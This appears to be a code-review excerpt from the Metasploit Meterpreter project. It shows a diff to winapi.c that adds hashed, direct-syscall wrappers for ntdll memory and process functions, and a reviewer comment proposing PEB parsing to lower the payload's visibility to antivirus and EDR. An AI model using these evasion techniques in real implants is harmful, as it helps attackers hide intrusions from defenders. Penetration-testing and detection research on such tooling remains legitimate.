c/meterpreter/source/metsrv/winapi.c

```diff
@@ -1,109 +1,1074 @@
-#ifndef _METERPRETER_WINAPI_H
-#define _METERPRETER_WINAPI_H
+#ifndef _METERPRETER_WINAPI_C
+#define _METERPRETER_WINAPI_C
+#include "winapi.h"
 
+#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.h"
 #include "common.h"
 
 #define KERNEL32_DLL "kernel32.dll"
 #define NTDLL_DLL "ntdll.dll"
+#define ADVAPI32_DLL "advapi32.dll"
+#define CRYPT32_DLL "crypt32.dll"
+#define USER32_DLL "user32.dll"
+#define WS2_32_DLL "ws2_32.dll"
+#define RPCRT4_DLL "rpcrt4.dll"
+#define WINHTTP_DLL "winhttp.dll"
+#define WININET_DLL "wininet.dll"
 
-void *GetFunction(LPCSTR lpModuleName, LPCSTR lpFunctionName) {
+typedef struct NtDllFunction {
+    LPCSTR lpFunctionName;
+    DWORD dwNumberOfArgs;
+} NtDllFunction;
+
+NtDllFunction lpFunctionsTobeLoaded[] = {
+    {.lpFunctionName = "ZwAllocateVirtualMemory", .dwNumberOfArgs = 6},
+    {.lpFunctionName = "ZwOpenProcess", .dwNumberOfArgs = 4},
+    {.lpFunctionName = "ZwWriteVirtualMemory", .dwNumberOfArgs = 5},
+    {.lpFunctionName = "ZwReadVirtualMemory", .dwNumberOfArgs = 5},
+    {.lpFunctionName = "ZwProtectVirtualMemory", .dwNumberOfArgs = 5},
+    {.lpFunctionName = "ZwQueryVirtualMemory", .dwNumberOfArgs = 6},
+    {.lpFunctionName = "ZwFreeVirtualMemory", .dwNumberOfArgs = 4}};
+
+enum NtDllSyscall {
+    ZwAllocateVirtualMemory,
+    ZwOpenProcess,
+    ZwWriteVirtualMemory,
+    ZwReadVirtualMemory,
+    ZwProtectVirtualMemory,
+    ZwQueryVirtualMemory,
+    ZwFreeVirtualMemory
+};
+
+#define STATUS_SUCCESS 0
+Syscall** lpWinApiSyscalls = NULL;
+
+extern NTSTATUS SyscallStub(Syscall* pSyscall, ...);
+
+Syscall** GetOrInitWinApiSyscalls() {
+    if (lpWinApiSyscalls == NULL) {
+        BOOL bError = FALSE;
+        HANDLE hHeap = GetProcessHeap();
+        bError = hHeap == NULL;
+        DWORD dwNumbOfSyscalls = sizeof(lpFunctionsTobeLoaded) / sizeof(NtDllFunction);
+        Syscall* lpSyscall = NULL;
+        if (!bError) {
+            lpWinApiSyscalls = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(Syscall*) * dwNumbOfSyscalls);
+            dprintf("[WINAPI][GetOrInitWinApiSyscalls] lpWinApiSyscalls = %p", lpWinApiSyscalls);
+            bError = lpWinApiSyscalls == NULL;
+        }
+        if (!bError) {
+            for (DWORD i = 0; i < dwNumbOfSyscalls; i++) {
+                lpSyscall = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(Syscall));
+                bError = lpSyscall == NULL;
+                if (bError) {
+                    break;
+                }
+                lpSyscall->dwCryptedHash = _hash((char*)lpFunctionsTobeLoaded[i].lpFunctionName);
+                lpSyscall->dwNumberOfArgs = lpFunctionsTobeLoaded[i].dwNumberOfArgs;
+                lpWinApiSyscalls[i] = lpSyscall;
+                dprintf("[WINAPI][GetOrInitWinApiSyscalls] lpSyscall = %p; dwCryptedHash = %p", lpSyscall, lpSyscall->dwCryptedHash);
+            }
+        }
+        if (!bError) {
+            bError = !getSyscalls(GetModuleHandleA(NTDLL_DLL), lpWinApiSyscalls, dwNumbOfSyscalls);
```

Comment:
I'm just wondering if we should use `GetModuleHandleA` to get NTDLL base address. Maybe we could avoid this dependency to reduce the footprint by parsing the PEB? I think calling this function might be a red flag for AV/EDR, but I might be wrong.

Also, same question for `GetProcessHeap` above (line 50).